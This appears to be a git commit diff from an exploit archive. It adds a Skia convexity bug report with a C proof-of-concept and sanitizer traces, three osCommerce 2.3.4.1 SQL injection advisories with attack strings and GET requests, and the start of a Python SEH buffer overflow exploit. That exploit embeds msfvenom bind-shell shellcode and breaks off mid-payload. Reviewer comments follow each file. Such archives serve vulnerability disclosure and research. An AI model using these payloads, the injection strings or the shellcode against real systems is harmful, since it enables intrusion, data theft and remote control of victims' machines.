DB: 2019-02-07
5 changes to exploits/shellcodes Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows River Past Audio Converter 7.7.16 - Buffer Overflow (SEH) osCommerce 2.3.4.1 - 'currency' SQL Injection osCommerce 2.3.4.1 - 'products_id' SQL Injection osCommerce 2.3.4.1 - 'reviews_id' SQL Injection
This commit is contained in:
parent
d667cf901c
commit
e965ded980
6 changed files with 408 additions and 0 deletions
225
exploits/multiple/dos/46332.txt
Normal file
|
@ -0,0 +1,225 @@
|
|||
I was looking into the root cause of https://bugs.chromium.org/p/chromium/issues/detail?id=850350. In that bug, due to precision errors, Skia generated a concave RRect, but declared it convex. Later, the RRect was transformed with an affine transform and used as a clipping region for drawing. Because the convex path filling algorithm was used while the path was actually concave, this broke some assumptions and led to a stack out-of-bounds write.
|
||||
|
||||
The bug was fixed by addressing the precision errors in RRect generation. However, there is another subtle issue:
|
||||
|
||||
If Skia ever declares a path convex, the convexity attribute is going to survive affine transforms. Normally, in geometry, transforming a convex path with an affine transform is always going to result in a convex path. However, in Skia, due to precision limitations, that assumption might be incorrect because:
|
||||
|
||||
a) Due to precision errors, Skia may declare a polygon with tiny concavities to be convex. Using an affine transform, the concavities can then be rotated and enlarged.
|
||||
b) It might be possible, that due to precision errors, applying an affine transform on a convex path might result in tiny concavities that can be blown up by subsequent transformations.
|
||||
|
||||
There are possible multiple places where using a concave polygon with incorrect convexity attribute might lead to problems. The one I used in the PoC is the same as in https://bugs.chromium.org/p/chromium/issues/detail?id=850350. What happens there is walk_convex_edges() being used on a concave path:
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_Path.cpp?l=213&rcl=61c5108108acaeb4ee7fc8cb97c41f4f97d99040
|
||||
This leads to breaking another Skia assumption - that the image is always going to be rendered in the top-to-bottom, left-to-right order.
|
||||
If the path is used as a clipping region, this leads to incorrect ordering of runs in SkRgnBuilder. When the correspoding SkRgnClipBlitter is used, the "left < right" assumption gets broken here
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkBlitter.cpp?l=612&rcl=b2a232fb20358ccd6c7c2fafb7e83e444e4e2458
|
||||
which results in calling SkAlphaRuns::Break with the negative "count" argument, which leads to out-of-bounds write here:
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=154
|
||||
|
||||
The following Skia program demonstrates the issue:
|
||||
|
||||
=================================================================
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
#include "SkCanvas.h"
|
||||
#include "SkPath.h"
|
||||
#include "SkBitmap.h"
|
||||
#include "SkRegion.h"
|
||||
|
||||
int main(int argc, char * const argv[]) {
|
||||
|
||||
SkBitmap bitmap;
|
||||
bitmap.allocN32Pixels(24, 24);
|
||||
SkCanvas canvas(bitmap);
|
||||
|
||||
SkPaint paint;
|
||||
paint.setAntiAlias(true);
|
||||
paint.setStyle(SkPaint::kFill_Style);
|
||||
|
||||
// This is monotone in both x and y, but has a tiny concavity
|
||||
SkPath path;
|
||||
path.moveTo(-1,-1);
|
||||
path.lineTo(0, 0);
|
||||
path.lineTo(0, 0.5e-10);
|
||||
path.lineTo(0.1e-10, 1.1e-10);
|
||||
path.lineTo(1.5e-10, 1.1e-10);
|
||||
path.lineTo(1.5e-10, 2.5e-10);
|
||||
path.lineTo(0.9, 1);
|
||||
path.lineTo(-1, 1);
|
||||
path.close();
|
||||
|
||||
// If asked, Skia is going to declare it convex
|
||||
if(path.isConvex()) {
|
||||
printf("convex\n");
|
||||
} else {
|
||||
printf("not convex\n");
|
||||
}
|
||||
|
||||
// The convexity flag is going to survive all affine transforms
|
||||
// Even those that will enlarge the concavity and make the path
|
||||
// non-monotone.
|
||||
SkMatrix m;
|
||||
m.setRotate(-45);
|
||||
m.postScale(10e10, 10e10);
|
||||
m.postSkew(-1, 0);
|
||||
m.postTranslate(1, 10);
|
||||
path.transform(m);
|
||||
|
||||
// As demonstrated here
|
||||
if(path.isConvex()) {
|
||||
printf("convex\n");
|
||||
} else {
|
||||
printf("not convex\n");
|
||||
}
|
||||
|
||||
// We'll use the path as a clip region
|
||||
canvas.clipPath(path);
|
||||
|
||||
// And now we'll just draw a simple triangle.
|
||||
SkPath path2;
|
||||
path2.moveTo(15.5, 15);
|
||||
path2.lineTo(50.5, 50);
|
||||
path2.lineTo(-19.5, 50);
|
||||
path2.close();
|
||||
canvas.drawPath(path2, paint);
|
||||
|
||||
printf("done\n");
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
=================================================================
|
||||
|
||||
ASan log:
|
||||
|
||||
=================================================================
|
||||
==139872==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffc5c8950d4 at pc 0x00000135512e bp 0x7ffc5c894f30 sp 0x7ffc5c894f28
|
||||
WRITE of size 1 at 0x7ffc5c8950d4 thread T0
|
||||
#0 0x135512d in SkAlphaRuns::Break(short*, unsigned char*, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkAntiRun.h:154:26
|
||||
#1 0x135512d in SkRgnClipBlitter::blitAntiH(int, int, unsigned char const*, short const*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.cpp:615
|
||||
#2 0xac437f in SkBlitter::blitAntiH2(int, int, unsigned int, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.h:96:15
|
||||
#3 0x1465fa4 in blit_trapezoid_row(AdditiveBlitter*, int, int, int, int, int, int, int, unsigned char, unsigned char*, bool, bool, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp
|
||||
#4 0x1465fa4 in aaa_walk_convex_edges(SkAnalyticEdge*, AdditiveBlitter*, int, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1187
|
||||
#5 0x1465fa4 in aaa_fill_path(SkPath const&, SkIRect const&, AdditiveBlitter*, int, int, bool, bool, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1669
|
||||
#6 0x1465fa4 in SkScan::AAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AAAPath.cpp:1713
|
||||
#7 0xad5687 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AntiPath.cpp:844:9
|
||||
#8 0xad6cf6 in SkScan::AntiFillPath(SkPath const&, SkRasterClip const&, SkBlitter*, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkScan_AntiPath.cpp:883:9
|
||||
#9 0x9c5902 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.cpp:1018:5
|
||||
#10 0x9c64b9 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.cpp:1101:11
|
||||
#11 0x13478f3 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkDraw.h:56:15
|
||||
#12 0x13478f3 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBitmapDevice.cpp:407
|
||||
#13 0x98e9ce in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkCanvas.cpp:2141:23
|
||||
#14 0x983f71 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkCanvas.cpp:1694:11
|
||||
#15 0x69add0 in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../example/SkiaSDLExample.cpp:63:10
|
||||
#16 0x7ff1044112b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
|
||||
#17 0x5ab0e9 in _start (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/SkiaSDLExample+0x5ab0e9)
|
||||
|
||||
Address 0x7ffc5c8950d4 is located in stack of thread T0 at offset 52 in frame
|
||||
#0 0xac421f in SkBlitter::blitAntiH2(int, int, unsigned int, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkBlitter.h:87
|
||||
|
||||
This frame has 2 object(s):
|
||||
[32, 38) 'runs'
|
||||
[64, 66) 'aa' <== Memory access at offset 52 underflows this variable
|
||||
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
|
||||
(longjmp and C++ exceptions *are* supported)
|
||||
SUMMARY: AddressSanitizer: stack-buffer-overflow /usr/local/google/home/ifratric/p0/skia/skia20181029/out/asan/../../src/core/SkAntiRun.h:154:26 in SkAlphaRuns::Break(short*, unsigned char*, int, int)
|
||||
Shadow bytes around the buggy address:
|
||||
0x10000b90a9c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10000b90a9d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10000b90a9e0: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 f2
|
||||
0x10000b90a9f0: f2 f2 f2 f2 04 f2 04 f3 00 00 00 00 00 00 00 00
|
||||
0x10000b90aa00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
=>0x10000b90aa10: 00 00 00 00 f1 f1 f1 f1 06 f2[f2]f2 02 f3 f3 f3
|
||||
0x10000b90aa20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10000b90aa30: f1 f1 f1 f1 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10000b90aa40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10000b90aa50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
0x10000b90aa60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|
||||
Shadow byte legend (one shadow byte represents 8 application bytes):
|
||||
Addressable: 00
|
||||
Partially addressable: 01 02 03 04 05 06 07
|
||||
Heap left redzone: fa
|
||||
Freed heap region: fd
|
||||
Stack left redzone: f1
|
||||
Stack mid redzone: f2
|
||||
Stack right redzone: f3
|
||||
Stack after return: f5
|
||||
Stack use after scope: f8
|
||||
Global redzone: f9
|
||||
Global init order: f6
|
||||
Poisoned by user: f7
|
||||
Container overflow: fc
|
||||
Array cookie: ac
|
||||
Intra object redzone: bb
|
||||
ASan internal: fe
|
||||
Left alloca redzone: ca
|
||||
Right alloca redzone: cb
|
||||
==139872==ABORTING
|
||||
|
||||
################################################################################
|
||||
|
||||
Another variant of this issue can be triggered while rendering a concave path with SkScan::SAAFillPath algorithm.
|
||||
|
||||
When drawing a path with SkScan::SAAFillPath, if the path is concave but Skia thinks it's convex, this can lead to SuperBlitter::blitH without respecting the the top-to-bottom, left-to-right order. In this case, this leads to SkAlphaRuns::add also being called out-of-order, which leads to SkAlphaRuns::Break being called with a negative "x" argument, which leads to uninitialized memory being read here:
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&l=150&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c
|
||||
Which then leads to out-of-bounds reads/writes on the following lines:
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=154
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkAntiRun.h?g=0&rcl=c640d0dc96924699fdbb1a3cbdc907aa07b1cb3c&l=155
|
||||
|
||||
This issue is also triggerable in Chrome by simply drawing a path to the canvas.
|
||||
|
||||
Skia and Chrome PoCs are attached.
|
||||
|
||||
|
||||
MSan log from Skia:
|
||||
|
||||
==55058==WARNING: MemorySanitizer: use-of-uninitialized-value
|
||||
#0 0xcb9188 in SkAlphaRuns::Break(short*, unsigned char*, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAntiRun.h:155:17
|
||||
#1 0xcb9188 in SkAlphaRuns::add(int, unsigned int, int, unsigned int, unsigned int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAntiRun.h:83
|
||||
#2 0xcb9188 in SuperBlitter::blitH(int, int, int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:251
|
||||
#3 0xce2e0e in walk_convex_edges(SkEdge*, SkPath::FillType, SkBlitter*, int, int, void (*)(SkBlitter*, int, bool)) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_Path.cpp:278:30
|
||||
#4 0xce0b79 in sk_fill_path(SkPath const&, SkIRect const&, SkBlitter*, int, int, int, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_Path.cpp:488:9
|
||||
#5 0xcbc6f3 in SkScan::SAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:737:9
|
||||
#6 0xcbe0a2 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:852:9
|
||||
#7 0xb02720 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1018:5
|
||||
#8 0xb03efc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1101:11
|
||||
#9 0x19efe03 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.h:56:15
|
||||
#10 0x19efe03 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBitmapDevice.cpp:407
|
||||
#11 0xab09cb in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:2141:23
|
||||
#12 0xaa0237 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:1694:11
|
||||
#13 0x62077d in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../example/SkiaSDLExample.cpp:52:10
|
||||
#14 0x7f8901e5f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
|
||||
#15 0x5af729 in _start (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/SkiaSDLExample+0x5af729)
|
||||
|
||||
Uninitialized value was created by a heap allocation
|
||||
#0 0x5b799c in __interceptor_malloc (/usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/SkiaSDLExample+0x5b799c)
|
||||
#1 0xdb06dd in sk_malloc_flags(unsigned long, unsigned int) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/ports/SkMemory_malloc.cpp:71:13
|
||||
#2 0xb0b9c7 in sk_malloc_throw(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../include/private/SkMalloc.h:59:12
|
||||
#3 0xb0b9c7 in SkAutoMalloc::reset(unsigned long, SkAutoMalloc::OnShrink) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkAutoMalloc.h:53
|
||||
#4 0xb0b9c7 in SkBlitter::allocBlitMemory(unsigned long) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBlitter.h:137
|
||||
#5 0xcb6c9d in SuperBlitter::SuperBlitter(SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:159:32
|
||||
#6 0xcbc648 in SkScan::SAAFillPath(SkPath const&, SkBlitter*, SkIRect const&, SkIRect const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:736:22
|
||||
#7 0xcbe0a2 in SkScan::AntiFillPath(SkPath const&, SkRegion const&, SkBlitter*, bool, SkDAARecord*) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkScan_AntiPath.cpp:852:9
|
||||
#8 0xb02720 in SkDraw::drawDevPath(SkPath const&, SkPaint const&, bool, SkBlitter*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1018:5
|
||||
#9 0xb03efc in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool, bool, SkBlitter*) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.cpp:1101:11
|
||||
#10 0x19efe03 in SkDraw::drawPath(SkPath const&, SkPaint const&, SkMatrix const*, bool) const /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkDraw.h:56:15
|
||||
#11 0x19efe03 in SkBitmapDevice::drawPath(SkPath const&, SkPaint const&, bool) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkBitmapDevice.cpp:407
|
||||
#12 0xab09cb in SkCanvas::onDrawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:2141:23
|
||||
#13 0xaa0237 in SkCanvas::drawPath(SkPath const&, SkPaint const&) /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../src/core/SkCanvas.cpp:1694:11
|
||||
#14 0x62077d in main /usr/local/google/home/ifratric/p0/skia/skia20181029/out/msan/../../example/SkiaSDLExample.cpp:52:10
|
||||
#15 0x7f8901e5f2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
|
||||
|
||||
################################################################################
|
||||
|
||||
A third variant of this, which is also exploitable in Chrome (I just linked to the ClusterFuzz testcase) is when a path is rendered SkScan::SAAFillPath with a MaskSuperBlitter. In this case, rendering concave path as convex leads to "x" coordinate being increased beyond the image bounds, which leads to incrementing out-of-bounds data in
|
||||
https://skia.googlesource.com/skia/+/fa7df23d8b0c4121adfc5ad45c295e7077fad3f5/src/core/SkScan_AntiPath.cpp#483
|
||||
|
||||
Note: ptr normally points inside
|
||||
https://cs.chromium.org/chromium/src/third_party/skia/src/core/SkScan_AntiPath.cpp?type=cs&g=0&l=435&rcl=05caa69a3f5aa45fd230ec302e6da1522d993747
|
||||
which is (in this case) allocated on the stack, so this variant gives us a stack out-of-bounds increment by a chosen small value, which is a pretty nice exploitation primitive.
|
||||
|
||||
PoCs for Skia and Chrome are attached.
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/46332.zip
|
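Review bot: the first variant's prose links walk_convex_edges() in SkScan_Path.cpp, but the ASan trace directly below it reaches the crash through aaa_walk_convex_edges() and SkScan::AAAFillPath in SkScan_AAAPath.cpp (frames #3 to #6), while walk_convex_edges() in SkScan_Path.cpp only appears in the second variant's MSan trace (frame #3); the text should say that both the analytic AA walker and the supersampling walker inherit the bad convexity flag and name which one each PoC exercises. The write-up states in two places that Skia and Chrome PoCs are attached, but the only artifact this file references is the 46332.zip link at the bottom, so it should say what the archive contains (the Skia program above, the Chrome case, or both). Minor: "correspoding" and "the the" are typos, and unlike the other files in this commit this one has no header with title, author, date or the affected and fixed Skia revisions, which are otherwise only implied by the rcl= parameters in the links.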
37
exploits/php/webapps/46328.txt
Normal file
|
@ -0,0 +1,37 @@
|
|||
####################################################################
|
||||
|
||||
# Exploit Title: osCommerce 2.3.4.1 - 'currency' SQL Vulnerabilities
|
||||
# Dork: N/A
|
||||
# Date: 05-02-2019
|
||||
# Exploit Author: Mehmet EMIROGLU
|
||||
# Vendor Homepage: https://www.oscommerce.com
|
||||
# Software Link: https://www.oscommerce.com/Products
|
||||
# Version: 2.3.4.1
|
||||
# Category: Webapps
|
||||
# Tested on: Wampp @Win
|
||||
# CVE: N/A
|
||||
# Software Description: osCommerce Online Merchant is a complete online
|
||||
store solution
|
||||
that contains both a shop frontend and an administration backend
|
||||
which can be easily configured and customized with over 8,855 free
|
||||
add-ons.
|
||||
|
||||
####################################################################
|
||||
|
||||
# Vulnerabilities / Impact
|
||||
# This web application called as osCommerce 2.3.4.1 version.
|
||||
# Switch to the shopping_cart tab. Replace the ID value in the url, with a
|
||||
high number value.
|
||||
for example shopping_cart.php?currency=1 change to 9999999
|
||||
then add the payload at Attack_pattern to the end of the url.
|
||||
|
||||
####################################################################
|
||||
|
||||
# POC - SQL (Boolean Based)
|
||||
# Parameters : currency
|
||||
# Attack Pattern : %27 oR 3620772=3620772 aNd %276199%27=%276199
|
||||
# GET Request :
|
||||
http://localhost/oscommerce/catalog/shopping_cart.php?currency=99999999%27
|
||||
oR 3620772=3620772 aNd %276199%27=%276199
|
||||
|
||||
####################################################################
|
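Review bot: the advisory gives no evidence that the boolean condition changes the server's response; for a boolean-based injection the file should record what the page returns for the true condition (3620772=3620772) versus a false one, and which query in shopping_cart.php uses the currency value, otherwise a reader cannot distinguish the finding from a harmless tautology. The GET request is also hard-wrapped after "99999999%27", so the line break falls inside the URL; keep it on one line. Minor: the title says "SQL Vulnerabilities" while the files_exploits.csv row for 46328 in this commit says "SQL Injection", "Tested on: Wampp @Win" presumably means WAMP on Windows and should name the PHP/MySQL versions, and there is no vendor notification or fix status.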
37
exploits/php/webapps/46329.txt
Normal file
|
@ -0,0 +1,37 @@
|
|||
####################################################################
|
||||
|
||||
# Exploit Title: osCommerce 2.3.4.1 - 'products_id' SQL Vulnerabilities
|
||||
# Dork: N/A
|
||||
# Date: 05-02-2019
|
||||
# Exploit Author: Mehmet EMIROGLU
|
||||
# Vendor Homepage: https://www.oscommerce.com
|
||||
# Software Link: https://www.oscommerce.com/Products
|
||||
# Version: 2.3.4.1
|
||||
# Category: Webapps
|
||||
# Tested on: Wampp @Win
|
||||
# CVE: N/A
|
||||
# Software Description: osCommerce Online Merchant is a complete online
|
||||
store solution
|
||||
that contains both a shop frontend and an administration backend
|
||||
which can be easily configured and customized with over 8,855 free
|
||||
add-ons.
|
||||
|
||||
####################################################################
|
||||
|
||||
# Vulnerabilities / Impact
|
||||
# This web application called as osCommerce 2.3.4.1 version.
|
||||
# Switch to the product_info tab. Replace the ID value in the url, with a
|
||||
high number value.
|
||||
for example product_info.php?products_id=1 change to 9999999
|
||||
then add the payload at Attack_pattern to the end of the url.
|
||||
|
||||
####################################################################
|
||||
|
||||
# POC - SQL (Boolean Based)
|
||||
# Parameters : products_id
|
||||
# Attack Pattern : oR 1811160=1811160 aNd 7193=7193
|
||||
# GET Request :
|
||||
http://localhost/oscommerce/catalog/product_info.php?products_id=99999999
|
||||
oR 1811160=1811160 aNd 7193=7193
|
||||
|
||||
####################################################################
|
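Review bot: the request is split across two lines after "products_id=99999999", so as written the pattern is not part of the URL; join the lines. The pattern here carries no quote (unlike the currency advisory in this commit), which implies products_id is used in a numeric context; the file should say so and show the differing responses for the true and false condition, since "oR 1811160=1811160" on its own does not demonstrate injection. The header block is otherwise a verbatim copy of 46328.txt, product description included; the three osCommerce advisories in this commit could cross-reference each other or share one write-up with a table of affected parameters.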
36
exploits/php/webapps/46330.txt
Normal file
|
@ -0,0 +1,36 @@
|
|||
####################################################################
|
||||
|
||||
# Exploit Title: osCommerce 2.3.4.1 - 'reviews_id' SQL Vulnerabilities
|
||||
# Dork: N/A
|
||||
# Date: 05-02-2019
|
||||
# Exploit Author: Mehmet EMIROGLU
|
||||
# Vendor Homepage: https://www.oscommerce.com
|
||||
# Software Link: https://www.oscommerce.com/Products
|
||||
# Version: 2.3.4.1
|
||||
# Category: Webapps
|
||||
# Tested on: Wampp @Win
|
||||
# CVE: N/A
|
||||
# Software Description: osCommerce Online Merchant is a complete online
|
||||
store solution
|
||||
that contains both a shop frontend and an administration backend
|
||||
which can be easily configured and customized with over 8,855 free
|
||||
add-ons.
|
||||
|
||||
####################################################################
|
||||
|
||||
# Vulnerabilities / Impact
|
||||
# This web application called as osCommerce 2.3.4.1 version.
|
||||
# Switch to the product reviews tab. Replace the ID value in the url, with
|
||||
a high number value.
|
||||
for example reviews_id=2 change to 9999999
|
||||
then add the payload at Attack_pattern to the end of the url.
|
||||
|
||||
####################################################################
|
||||
|
||||
# POC - SQL (Boolean Based)
|
||||
# Parameters : reviews_id
|
||||
# Attack Pattern : /**/oR/**/7096077=7096077/**/aNd/**/7193=7193
|
||||
# GET Request :
|
||||
http://localhost/oscommerce/catalog/product_reviews_write.php?products_id=19&reviews_id=99999999/**/oR/**/7096077=7096077/**/aNd/**/7193=7193
|
||||
|
||||
####################################################################
|
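Review bot: the request hard-codes products_id=19, which is specific to the test installation and is not a parameter this advisory claims is vulnerable; state that it is an arbitrary existing product id, or drop it if reviews_id alone reproduces the issue. The /**/ spacing in the pattern differs from the other two osCommerce advisories in this commit without explanation; use one consistent pattern or explain the difference. As with the other two files, the true/false response difference and the affected source location are missing, and "Tested on: Wampp @Win" should name the stack (WAMP on Windows) and the PHP/MySQL versions.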
68
exploits/windows/local/46331.py
Executable file
|
@ -0,0 +1,68 @@
|
|||
# Exploit Title: River_Past_Audio_Converter - Buffer Overflow (SEH)
|
||||
# Date: 06.02.2019
|
||||
# Vendor Homepage: www.riverpast.com
|
||||
# Software Link: https://en.softonic.com/download/river-past-audio-converter/windows/post-download?sl=3D1
|
||||
# Exploit Author: Matteo Malvica
|
||||
# Tested Version: 7.7.16
|
||||
# Tested on: Windows 10 - 10.0.17134.1
|
||||
# Vulnerability Type: Local Buffer Overflow (SEH)
|
||||
#
|
||||
# Steps:
|
||||
# 1.- Run python code : River_Past_Audio_Converter.py
|
||||
# 2.- Open carbonara.txt and copy content to clipboard
|
||||
# 3.- Open River_PastAudio_Converter.exe and click on the 'Options' inside fhe 'File' menu.
|
||||
# 4.- Paste the content of carbonara.txt into the 'Lame_enc.dll' name field.
|
||||
# 5.- Click 'OK' and you will have a bind shell listening on port 4444.
|
||||
|
||||
import socket
|
||||
import struct
|
||||
|
||||
#msfvenom -p windows/shell_bind_tcp LPORT=4444 -a x86 -b '\x00\x0d\x0a\x42' -f python
|
||||
shellcode = ""
|
||||
shellcode += "\x31\xc9\x83\xe9\xae\xe8\xff\xff\xff\xff\xc0\x5e\x81"
|
||||
shellcode += "\x76\x0e\xba\xfe\x4d\xcc\x83\xee\xfc\xe2\xf4\x46\x16"
|
||||
shellcode += "\xcf\xcc\xba\xfe\x2d\x45\x5f\xcf\x8d\xa8\x31\xae\x7d"
|
||||
shellcode += "\x47\xe8\xf2\xc6\x9e\xae\x75\x3f\xe4\xb5\x49\x07\xea"
|
||||
shellcode += "\x8b\x01\xe1\xf0\xdb\x82\x4f\xe0\x9a\x3f\x82\xc1\xbb"
|
||||
shellcode += "\x39\xaf\x3e\xe8\xa9\xc6\x9e\xaa\x75\x07\xf0\x31\xb2"
|
||||
shellcode += "\x5c\xb4\x59\xb6\x4c\x1d\xeb\x75\x14\xec\xbb\x2d\xc6"
|
||||
shellcode += "\x85\xa2\x1d\x77\x85\x31\xca\xc6\xcd\x6c\xcf\xb2\x60"
|
||||
shellcode += "\x7b\x31\x40\xcd\x7d\xc6\xad\xb9\x4c\xfd\x30\x34\x81"
|
||||
shellcode += "\x83\x69\xb9\x5e\xa6\xc6\x94\x9e\xff\x9e\xaa\x31\xf2"
|
||||
shellcode += "\x06\x47\xe2\xe2\x4c\x1f\x31\xfa\xc6\xcd\x6a\x77\x09"
|
||||
shellcode += "\xe8\x9e\xa5\x16\xad\xe3\xa4\x1c\x33\x5a\xa1\x12\x96"
|
||||
shellcode += "\x31\xec\xa6\x41\xe7\x96\x7e\xfe\xba\xfe\x25\xbb\xc9"
|
||||
shellcode += "\xcc\x12\x98\xd2\xb2\x3a\xea\xbd\x01\x98\x74\x2a\xff"
|
||||
shellcode += "\x4d\xcc\x93\x3a\x19\x9c\xd2\xd7\xcd\xa7\xba\x01\x98"
|
||||
shellcode += "\xa6\xb2\xa7\x1d\x2e\x47\xbe\x1d\x8c\xea\x96\xa7\xc3"
|
||||
shellcode += "\x65\x1e\xb2\x19\x2d\x96\x4f\xcc\xab\xa2\xc4\x2a\xd0"
|
||||
shellcode += "\xee\x1b\x9b\xd2\x3c\x96\xfb\xdd\x01\x98\x9b\xd2\x49"
|
||||
shellcode += "\xa4\xf4\x45\x01\x98\x9b\xd2\x8a\xa1\xf7\x5b\x01\x98"
|
||||
shellcode += "\x9b\x2d\x96\x38\xa2\xf7\x9f\xb2\x19\xd2\x9d\x20\xa8"
|
||||
shellcode += "\xba\x77\xae\x9b\xed\xa9\x7c\x3a\xd0\xec\x14\x9a\x58"
|
||||
